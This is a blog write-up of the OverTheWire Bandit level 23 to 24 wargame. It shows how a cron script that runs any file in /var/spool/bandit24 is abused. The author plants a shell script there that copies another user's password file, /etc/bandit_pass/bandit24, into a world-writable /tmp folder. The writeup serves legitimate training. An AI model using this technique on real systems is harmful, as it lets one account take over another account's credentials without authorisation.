home about me security writeups subscribe

BB

technology and craziness.

BB

technology and craziness.

OverTheWire - Bandit - Level 23 → Level 24

  | #Bandit #En #OverTheWire #Walkthrough #Writeup
 397 words   2 minutes 
Warning: This post contains a solution!
Only continue if:
1.) you want to see a possible alternative solution or
2.) you are stuck and need a hint!

Connect to the server using the following credentials:

Server: bandit.labs.overthewire.org
Port: 2220
Username: bandit23
Password: jc1uxxxxxxxxxxxxxxxxxxxxxxxxxxxx

Level Goal is:

A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.
NOTE: This level requires you to create your own first shell-script. This is a very big step and you should be proud of yourself when you beat this level!
NOTE 2: Keep in mind that your shell script is removed once executed, so you may want to keep a copy around…

Check the content of the folder /etc/cron.d/:

1
2

bandit23@bandit:~$ ls /etc/cron.d/
cronjob_bandit22  cronjob_bandit23  cronjob_bandit24

There are three files, the third one (cronjob_bandit24) is the interesting one for the current level. Take a look at the content:

1
2
3

bandit23@bandit:~$ cat /etc/cron.d/cronjob_bandit24
@reboot bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null
* * * * * bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null

A script (/usr/bin/cronjob_bandit24.sh) will be executed once on reboot and every minute. Take a look at the content of the script:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16

bandit23@bandit:~$ cat /usr/bin/cronjob_bandit24.sh 
#!/bin/bash

myname=$(whoami)

cd /var/spool/$myname
echo "Executing and deleting all scripts in /var/spool/$myname:"
for i in * .*;
do
    if [ "$i" != "." -a "$i" != ".." ];
    then
	echo "Handling $i"
	timeout -s 9 60 ./$i
	rm -f ./$i
    fi
done

As mentioned in line seven, this script is executing all scripts available in the folder ’/var/spool/$myname’’/var/spool/bandit24’ in our case. After executing a script, it deletes the script (line 14).

A temporary folder to save the flag to is needed, first create it and change chmod to 777 (lazy, I know):

1
2

bandit23@bandit:~$ mkdir /tmp/lvl2324
bandit23@bandit:~$ chmod 777 /tmp/lvl2324

Now, move to that temporary directory and create a short shell script, which writes the output of ’/etc/bandit_pass/bandit24’ to ’/tmp/lvl2324/password’:

1
2

#!/bin/bash
cat /etc/bandit_pass/bandit24 > /tmp/lvl2324/password

Copy that shell script file to ’/var/spool/bandit24’:

1

bandit23@bandit:/tmp/lvl2324$ cp script.sh /var/spool/bandit24/

Wait until the shell script file in the folder is deleted and check the password file:

1
2

bandit23@bandit:/tmp/lvl2324$ cat password 
UoMYxxxxxxxxxxxxxxxxxxxxxxxxxxxx

Don’t forget to delete the temporary folder:

1

bandit23@bandit:~$ rm -rf /tmp/lvl2324
Updated on 2018-12-30

Was my post useful? Consider buying me a coffee ☕️
Back | Home